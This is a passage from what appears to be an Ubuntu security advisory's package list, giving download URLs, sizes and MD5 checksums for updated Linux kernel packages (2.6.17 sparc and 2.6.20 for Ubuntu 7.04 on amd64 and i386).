http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12-sparc64-smp_2.6.17.1-12.43_sparc.deb Size/MD5: 809310 d712716cdd216a47f075ad891afe7200 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12-sparc64_2.6.17.1-12.43_sparc.deb Size/MD5: 805818 205ce72ffc9abe313c43f052fd41aa04 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12_2.6.17.1-12.43_sparc.deb Size/MD5: 7425700 6b3c927f2565066d8c40ee6c5af873bb http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-2.6.17-12-sparc64-smp_2.6.17.1-12.43_sparc.deb Size/MD5: 15629150 aca3a14023522857cc124dab5b6fcc14 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-2.6.17-12-sparc64_2.6.17.1-12.43_sparc.deb Size/MD5: 15290418 32a3cbd78d730462bf2035865fad8b6b http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-debug-2.6.17-12-sparc64-smp_2.6.17.1-12.43_sparc.deb Size/MD5: 2173092 f14524b75f7f8d9bfaa015c5ac794f2a http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-debug-2.6.17-12-sparc64_2.6.17.1-12.43_sparc.deb Size/MD5: 2087106 3a94b9b6c77794c967e47f74e20cfbcc http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-libc-dev_2.6.17.1-12.43_sparc.deb Size/MD5: 1813902 4ae123feb265722ce4933c087512b922 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/loop-modules-2.6.17-12-sparc64-di_2.6.17.1-12.43_sparc.udeb Size/MD5: 7398 347c248c966a079fd11caeb2464d646b http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/md-modules-2.6.17-12-sparc64-di_2.6.17.1-12.43_sparc.udeb Size/MD5: 263990 47724085bae25d550fc824923cac6b03 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nfs-modules-2.6.17-12-sparc64-di_2.6.17.1-12.43_sparc.udeb Size/MD5: 229200 e7829c679aec5f8d5abc3120ad64218c http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-firmware-2.6.17-12-sparc64-di_2.6.17.1-12.43_sparc.udeb Size/MD5: 1048450 be4b7beb10b78c9bdc7cd18cd5444341 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-modules-2.6.17-12-sparc64-di_2.6.17.1-12.43_sparc.udeb Size/MD5: 1922030 e6d6613dee43a7fb059d176bf1094982 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-shared-modules-2.6.17-12-sparc64-di_2.6.17.1-12.43_sparc.udeb Size/MD5: 9910 972e3885f262adacd88ef959fbb8a510 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/parport-modules-2.6.17-12-sparc64-di_2.6.17.1-12.43_sparc.udeb Size/MD5: 40354 556823d49a81a7cd1b6a27c57c6ffaa5 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/plip-modules-2.6.17-12-sparc64-di_2.6.17.1-12.43_sparc.udeb Size/MD5: 8716 dc451bd092f7262f5e31806ce1b66657 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ppp-modules-2.6.17-12-sparc64-di_2.6.17.1-12.43_sparc.udeb Size/MD5: 59390 7858515ff779dd8da58fd850c019708f http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/reiserfs-modules-2.6.17-12-sparc64-di_2.6.17.1-12.43_sparc.udeb Size/MD5: 162876 499f20d3a838059e6f662b43a293ef11 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-core-modules-2.6.17-12-sparc64-di_2.6.17.1-12.43_sparc.udeb Size/MD5: 66654 434a52f0d4ad9bf95b0fee7b6eae34f7 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-modules-2.6.17-12-sparc64-di_2.6.17.1-12.43_sparc.udeb Size/MD5: 855872 19e82882095228999b8cecf4fe476273 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-modules-2.6.17-12-sparc64-di_2.6.17.1-12.43_sparc.udeb Size/MD5: 51826 fde5d623191150a5f933bd18f65a8c34 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-storage-modules-2.6.17-12-sparc64-di_2.6.17.1-12.43_sparc.udeb Size/MD5: 38422 505f084581b247b18c6dfaf28dd42b81 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/xfs-modules-2.6.17-12-sparc64-di_2.6.17.1-12.43_sparc.udeb Size/MD5: 283100 4fc122dfd0a59d50507fe961c0644dd8 Updated packages for Ubuntu 7.04: Source archives: http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-source-2.6.20_2.6.20-16.34.diff.gz Size/MD5: 1597203 2f8f7143e0b62b05852fd088e2cdd87e http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-source-2.6.20_2.6.20-16.34.dsc Size/MD5: 2472 8a6fa30067f917154268f54d18ad1d8f http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-source-2.6.20_2.6.20.orig.tar.gz Size/MD5: 62174876 f19203b2488d943a640abe8f3cd20f57 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-doc-2.6.20_2.6.20-16.34_all.deb Size/MD5: 4878092 0a9d06c63a48ab4de3a479ffad813429 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-kernel-devel_2.6.20-16.34_all.deb Size/MD5: 85686 6f0468702323c16fb43a01800a06866d http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-source-2.6.20_2.6.20-16.34_all.deb Size/MD5: 47825588 5b00b6faf438c78340d448bc1df0b379 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/acpi-modules-2.6.20-16-generic-di_2.6.20-16.34_amd64.udeb Size/MD5: 24494 995924530f52543de6454b7d746d9333 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/block-modules-2.6.20-16-generic-di_2.6.20-16.34_amd64.udeb Size/MD5: 202070 a90f97208c841006a291b7e8e59f2096 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fat-modules-2.6.20-16-generic-di_2.6.20-16.34_amd64.udeb Size/MD5: 39342 5bbfcb724ba3c3b3dab26cc87ab418dc http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fb-modules-2.6.20-16-generic-di_2.6.20-16.34_amd64.udeb Size/MD5: 50910 e631a706c635587623f8e4343cd782e5 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/firewire-core-modules-2.6.20-16-generic-di_2.6.20-16.34_amd64.udeb Size/MD5: 187500 2427fb977faa7812d945e84dffebb1f9 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/floppy-modules-2.6.20-16-generic-di_2.6.20-16.34_amd64.udeb Size/MD5: 34906 371ac621cc163f1283a7902751a8583e http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-core-modules-2.6.20-16-generic-di_2.6.20-16.34_amd64.udeb Size/MD5: 644402 dce5458d9ec5d23712c71df24499e92f http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-secondary-modules-2.6.20-16-generic-di_2.6.20-16.34_amd64.udeb Size/MD5: 174672 637bb28658492463bddb7f46c4b0c0fc http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ide-modules-2.6.20-16-generic-di_2.6.20-16.34_amd64.udeb Size/MD5: 76424 9b54d7503783fca16bfefa18aa2fd7a9 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/input-modules-2.6.20-16-generic-di_2.6.20-16.34_amd64.udeb Size/MD5: 57878 cdf5165244a3a47a29dedd359e7bf1ca http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ipv6-modules-2.6.20-16-generic-di_2.6.20-16.34_amd64.udeb Size/MD5: 140050 83dd75c64e81d878e6b656e96d9d4439 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/irda-modules-2.6.20-16-generic-di_2.6.20-16.34_amd64.udeb Size/MD5: 277462 b5006ab82457b0b74c6454c4d22e074d http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/kernel-image-2.6.20-16-generic-di_2.6.20-16.34_amd64.udeb Size/MD5: 1905350 1d415f58f530439ac5f51490f417eb28 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16-generic_2.6.20-16.34_amd64.deb Size/MD5: 858258 4e0d459249f034b388d7524c3e6c16ca http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16-lowlatency_2.6.20-16.34_amd64.deb Size/MD5: 858420 4179483fb702bd4cef04b9f6078a2757 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16-server_2.6.20-16.34_amd64.deb Size/MD5: 862708 01d71f8b4722922e179b524675fa1c2e http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16_2.6.20-16.34_amd64.deb Size/MD5: 8130074 83dcaf7f7e555da5bc1404854ed99fd3 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-2.6.20-16-generic_2.6.20-16.34_amd64.deb Size/MD5: 23066730 0334fcbd642e338771023109f5067a1b http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-2.6.20-16-server_2.6.20-16.34_amd64.deb Size/MD5: 23386230 8846cfc57c9565997449e491ce1b3d58 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-debug-2.6.20-16-generic_2.6.20-16.34_amd64.deb Size/MD5: 18428504 7d598c9a73f74055615ac8218eb5387b http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-debug-2.6.20-16-server_2.6.20-16.34_amd64.deb Size/MD5: 18699402 39c306a22805bf6974212e18cfb2fa3f http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-libc-dev_2.6.20-16.34_amd64.deb Size/MD5: 668772 34a70f259c72918becac26ad722afd7f http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/md-modules-2.6.20-16-generic-di_2.6.20-16.34_amd64.udeb Size/MD5: 246426 ec42790e28c6f00318c64b17c429de47 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/message-modules-2.6.20-16-generic-di_2.6.20-16.34_amd64.udeb Size/MD5: 144478 0c938f3447819c6722f9e58f4bf3de14 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nfs-modules-2.6.20-16-generic-di_2.6.20-16.34_amd64.udeb Size/MD5: 225116 d687f68a328f16ff4775d7bdc6e3e8f4 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-firmware-2.6.20-16-generic-di_2.6.20-16.34_amd64.udeb Size/MD5: 1110522 8f966a2cc693a2f8f4bdbe4a521835d5 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-modules-2.6.20-16-generic-di_2.6.20-16.34_amd64.udeb Size/MD5: 1754786 a35636dc91b7b744d184f63d4e766597 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-pcmcia-modules-2.6.20-16-generic-di_2.6.20-16.34_amd64.udeb Size/MD5: 140918 834c60d72611bc80799effe4eff27cfd http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-shared-modules-2.6.20-16-generic-di_2.6.20-16.34_amd64.udeb Size/MD5: 163384 6eb7c5ef728d3e5d0691dd988ebd90c9 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-usb-modules-2.6.20-16-generic-di_2.6.20-16.34_amd64.udeb Size/MD5: 265726 c639baa908a1f2d4beaccd72161089f1 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/parport-modules-2.6.20-16-generic-di_2.6.20-16.34_amd64.udeb Size/MD5: 34292 7a0ba4ef7bdb5c13fe8f03ba0125662f http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pata-modules-2.6.20-16-generic-di_2.6.20-16.34_amd64.udeb Size/MD5: 38436 a3817fa7f635d9a01d301ee2029ff04c http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pcmcia-modules-2.6.20-16-generic-di_2.6.20-16.34_amd64.udeb Size/MD5: 67678 7b0274fcc059bbfb21fc20952e135a83 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pcmcia-storage-modules-2.6.20-16-generic-di_2.6.20-16.34_amd64.udeb Size/MD5: 20960 9e84de99755587ca96a142706cd0bedb http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/plip-modules-2.6.20-16-generic-di_2.6.20-16.34_amd64.udeb Size/MD5: 8324 05b68369ac444eae95b592ea23b6cd77 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ppp-modules-2.6.20-16-generic-di_2.6.20-16.34_amd64.udeb Size/MD5: 54578 e1941db8408b6c4b463bdaa55b86670c http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/sata-modules-2.6.20-16-generic-di_2.6.20-16.34_amd64.udeb Size/MD5: 86020 ffd93c6cf7aa89815942ed67dcf387dc http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-firmware-2.6.20-16-generic-di_2.6.20-16.34_amd64.udeb Size/MD5: 322570 bcac6c4a20f00eaff1a70e8a82b79d17 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-modules-2.6.20-16-generic-di_2.6.20-16.34_amd64.udeb Size/MD5: 1046838 46e606e7580618aa35f2966873e6e3f2 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/serial-modules-2.6.20-16-generic-di_2.6.20-16.34_amd64.udeb Size/MD5: 43974 0d06666147c779d8696b110ea51c307f http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/socket-modules-2.6.20-16-generic-di_2.6.20-16.34_amd64.udeb Size/MD5: 12016 e71f09e05e8d1b043131ca3dd3ae6036 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/speakup-modules-2.6.20-16-generic-di_2.6.20-16.34_amd64.udeb Size/MD5: 61914 3c5b393e5c46b4e579ce54b7c8a0c4f2 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/storage-core-modules-2.6.20-16-generic-di_2.6.20-16.34_amd64.udeb Size/MD5: 377812 b1d4ee9bd922cbfad05754df5bd693bb http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/usb-modules-2.6.20-16-generic-di_2.6.20-16.34_amd64.udeb Size/MD5: 66666 978f2be56849ec76ba6fa1108dc7acf6 http://security.ubuntu.com/ubuntu/pool/universe/l/linux-source-2.6.20/linux-image-2.6.20-16-lowlatency_2.6.20-16.34_amd64.deb Size/MD5: 23126452 433c6213d6ddbaa3866b5d41a95dd11a http://security.ubuntu.com/ubuntu/pool/universe/l/linux-source-2.6.20/linux-image-debug-2.6.20-16-lowlatency_2.6.20-16.34_amd64.deb Size/MD5: 18478444 5135e34744d1d42b89a7ac531470f342 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/acpi-modules-2.6.20-16-386-di_2.6.20-16.34_i386.udeb Size/MD5: 20314 e0eebf4cc8b2ad8e5934ddbbbee9e67f http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/acpi-modules-2.6.20-16-generic-di_2.6.20-16.34_i386.udeb Size/MD5: 22890 c7da55d48b29becdeea97e5b65efcc5d http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/block-modules-2.6.20-16-386-di_2.6.20-16.34_i386.udeb Size/MD5: 210062 912613620e07b25a9ac1e37e1163bde3 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/block-modules-2.6.20-16-generic-di_2.6.20-16.34_i386.udeb Size/MD5: 212248 5cc4ecd7bd6e8a0c473fd15876fe3491 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/cdrom-modules-2.6.20-16-386-di_2.6.20-16.34_i386.udeb Size/MD5: 88688 e53906c8ed25b1422aa45147553ed319 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/cdrom-modules-2.6.20-16-generic-di_2.6.20-16.34_i386.udeb Size/MD5: 35622 36aece0ca9fd7987b512ca2774228a46 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fat-modules-2.6.20-16-386-di_2.6.20-16.34_i386.udeb Size/MD5: 37730 687f50289011f7f86ecc810d909fabef http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fat-modules-2.6.20-16-generic-di_2.6.20-16.34_i386.udeb Size/MD5: 38408 ec8eeaff0c82514dc53866fab80b1a39 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fb-modules-2.6.20-16-386-di_2.6.20-16.34_i386.udeb Size/MD5: 45642 53f8ed8e1f4d2132ca2f420169672627 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fb-modules-2.6.20-16-generic-di_2.6.20-16.34_i386.udeb Size/MD5: 45798 6021a27b11317424bbf3ef3edf05c457 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/firewire-core-modules-2.6.20-16-386-di_2.6.20-16.34_i386.udeb Size/MD5: 179462 a48d2ac3c14b78b32f893aae6d0bca9e http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/firewire-core-modules-2.6.20-16-generic-di_2.6.20-16.34_i386.udeb Size/MD5: 179832 0601087ab9d1a61cdffdc02b0b249588 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/floppy-modules-2.6.20-16-386-di_2.6.20-16.34_i386.udeb Size/MD5: 32102 f7785eca40c0aa02246b99907a6a6768 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/floppy-modules-2.6.20-16-generic-di_2.6.20-16.34_i386.udeb Size/MD5: 32428 9c64b5bbcb7a095bcdfa67010061d9d4 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-core-modules-2.6.20-16-386-di_2.6.20-16.34_i386.udeb Size/MD5: 648622 7b3e1c0ffc012d00a62a11bd3ce35cad http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-core-modules-2.6.20-16-generic-di_2.6.20-16.34_i386.udeb Size/MD5: 667448 67d08ad30ef8a3157b0cdd64a1314527 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-secondary-modules-2.6.20-16-386-di_2.6.20-16.34_i386.udeb Size/MD5: 178182 a7edf7640963b45e899143b71e847675 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-secondary-modules-2.6.20-16-generic-di_2.6.20-16.34_i386.udeb Size/MD5: 181270 82540ad55623e5bd7ebcf13bb67a1c6b http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ide-modules-2.6.20-16-386-di_2.6.20-16.34_i386.udeb Size/MD5: 72390 41eebcd4884e0a906e1f8834cb542636 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ide-modules-2.6.20-16-generic-di_2.6.20-16.34_i386.udeb Size/MD5: 74052 28857b1b544fde323ea0105db9238a8b http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/input-modules-2.6.20-16-386-di_2.6.20-16.34_i386.udeb Size/MD5: 53566 dcd7c1d2609d55b6042ff8a0479bcc38 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/input-modules-2.6.20-16-generic-di_2.6.20-16.34_i386.udeb Size/MD5: 54778 94e2322def463e0d1ecf327baf65740b http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ipv6-modules-2.6.20-16-386-di_2.6.20-16.34_i386.udeb Size/MD5: 129214 de8544736aec04cf79fe2cbd11c05fa0 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ipv6-modules-2.6.20-16-generic-di_2.6.20-16.34_i386.udeb Size/MD5: 134886 eb40e81e51a3f5f72baf9da22e5052af http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/irda-modules-2.6.20-16-386-di_2.6.20-16.34_i386.udeb Size/MD5: 275958 c354f73c7348da068d3be4a0ff3e7fc5 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/irda-modules-2.6.20-16-generic-di_2.6.20-16.34_i386.udeb Size/MD5: 274972 71d5c9ce3443eaaf7dced5a261c2822c http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/kernel-image-2.6.20-16-386-di_2.6.20-16.34_i386.udeb Size/MD5: 1816286 58b6d5fd27f0c2c5fdf3045026d5a9b0 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/kernel-image-2.6.20-16-generic-di_2.6.20-16.34_i386.udeb Size/MD5: 1886484 21da86216eab2f41f2d92373b45560d5 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16-386_2.6.20-16.34_i386.deb Size/MD5: 846920 4c3d0f777d35d3cf54cf3067e803432f http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16-generic_2.6.20-16.34_i386.deb Size/MD5: 850642 b95ffcca084a6e04033441395f2836d1 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16-lowlatency_2.6.20-16.34_i386.deb Size/MD5: 847422 2a89ba8097aa9c2d50f88ae1229a442a http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16-server-bigiron_2.6.20-16.34_i386.deb Size/MD5: 843400 7e69a21ea4e5628bb56b7e6c17497d87 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16-server_2.6.20-16.34_i386.deb Size/MD5: 837570 08df5ad96399ac2cb8b248b90413ac40 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16_2.6.20-16.34_i386.deb Size/MD5: 8119870 45aa58781c894784b98f37b8945c4eac http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-2.6.20-16-386_2.6.20-16.34_i386.deb Size/MD5: 23747632 aaa6ba776d667bd821d404c09ea761f7 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-2.6.20-16-generic_2.6.20-16.34_i386.deb Size/MD5: 23814104 9fe91f7a3242641ece3f382676af1eef http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-2.6.20-16-server-bigiron_2.6.20-16.34_i386.deb Size/MD5: 24376632 850eca8b8584ae7885fac7de41665291 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-2.6.20-16-server_2.6.20-16.34_i386.deb Size/MD5: 23866418 08cf06676f400745d293bf0cfe6ae40c http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-debug-2.6.20-16-386_2.6.20-16.34_i386.deb Size/MD5: 23589054 b3a05427be92591b6d2ece8a7668cc1f http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-debug-2.6.20-16-generic_2.6.20-16.34_i386.deb Size/MD5: 24168224 dddc871c7b897776e3882f481d1fa0e0 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-debug-2.6.20-16-server-bigiron_2.6.20-16.34_i386.deb Size/MD5: 25659442 eea9b0fedc82d6f68dddba4df546a566 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-debug-2.6.20-16-server_2.6.20-16.34_i386.deb Size/MD5: 24394132 acb6f49e06b90cc85eac2ae341abee23 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-libc-dev_2.6.20-16.34_i386.deb Size/MD5: 668798 d40b9e7086fc0d42b7de761f94930596 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/md-modules-2.6.20-16-386-di_2.6.20-16.34_i386.udeb Size/MD5: 244606 f62271f06d0212f827a7d7770a041142 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/md-modules-2.6.20-16-generic-di_2.6.20-16.34_i386.udeb Size/MD5: 250128 d95f6e913380f7128821f6c7b5dd3588 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/message-modules-2.6.20-16-386-di_2.6.20-16.34_i386.udeb Size/MD5: 132536 2ec726e0c56b255856ca675c582565be http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/message-modules-2.6.20-16-generic-di_2.6.20-16.34_i386.udeb Size/MD5: 133074 1da640a801c36aba904b64840a687412 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nfs-modules-2.6.20-16-386-di_2.6.20-16.34_i386.udeb Size/MD5: 213350 8018b90e2791732915721120184869e7 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nfs-modules-2.6.20-16-generic-di_2.6.20-16.34_i386.udeb Size/MD5: 220796 4c3aaff523b464dd26e214047741d1b1 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-firmware-2.6.20-16-386-di_2.6.20-16.34_i386.udeb Size/MD5: 1110420 e42be64a651baa1ec07cf7b5793a53ec http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-firmware-2.6.20-16-generic-di_2.6.20-16.34_i386.udeb Size/MD5: 1110524 a04cc23e2a0f1627bcd19ee0f4ec8c86 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-modules-2.6.20-16-386-di_2.6.20-16.34_i386.udeb Size/MD5: 1951334 be7a0897cc1af691a882e676179de046 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-modules-2.6.20-16-generic-di_2.6.20-16.34_i386.udeb Size/MD5: 1974714 323d8b3d45603201e292280087bd1e46 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-pcmcia-modules-2.6.20-16-386-di_2.6.20-16.34_i386.udeb Size/MD5: 149852 b938e982b26c50685e54a71ddfbe9eeb http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-pcmcia-modules-2.6.20-16-generic-di_2.6.20-16.34_i386.udeb Size/MD5: 142502 f217c35c7e0f8dd8374f7ca5fe81d581 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-shared-modules-2.6.20-16-386-di_2.6.20-16.34_i386.udeb Size/MD5: 160754 f2aceaddb871b3a9149ebc496740d4ec http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-shared-modules-2.6.20-16-generic-di_2.6.20-16.34_i386.udeb Size/MD5: 161954 4e11d0ecd7173f8500d080707c2f0935 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-usb-modules-2.6.20-16-386-di_2.6.20-16.34_i386.udeb Size/MD5: 252934 6a3a035d3e628262838240fdb59579ed http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-usb-modules-2.6.20-16-generic-di_2.6.20-16.34_i386.udeb Size/MD5: 255512 57dc8235378ddacfde72b287c9901b86 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/parport-modules-2.6.20-16-386-di_2.6.20-16.34_i386.udeb Size/MD5: 32758 a946d549be3c05ae6986a91fcbf2265d http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/parport-modules-2.6.20-16-generic-di_2.6.20-16.34_i386.udeb Size/MD5: 33336 3ee608671c87fb245110138646e52ba8 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pata-modules-2.6.20-16-386-di_2.6.20-16.34_i386.udeb Size/MD5: 38028 faa099182354c2e28582f735d0ede15f http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pata-modules-2.6.20-16-generic-di_2.6.20-16.34_i386.udeb Size/MD5: 38306 8d654a49806ba674778f73fbeaa0d259 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pcmcia-modules-2.6.20-16-386-di_2.6.20-16.34_i386.udeb Size/MD5: 81848 dee99778c5125ddf479770ff8c64ca21 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pcmcia-modules-2.6.20-16-generic-di_2.6.20-16.34_i386.udeb Size/MD5: 82092 0f5e88328f6799d422b5487d2fb36bff http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pcmcia-storage-modules-2.6.20-16-386-di_2.6.20-16.34_i386.udeb Size/MD5: 47690 77621576d3fc94d98d635ab517cdfc60 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pcmcia-storage-modules-2.6.20-16-generic-di_2.6.20-16.34_i386.udeb Size/MD5: 47718 846e219e80cc92e7b3f2fa76af3557f8 http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/plip-modules-2.6.20-16-386-di_2.6.20-16.34_i386.udeb Size/MD5: 8260 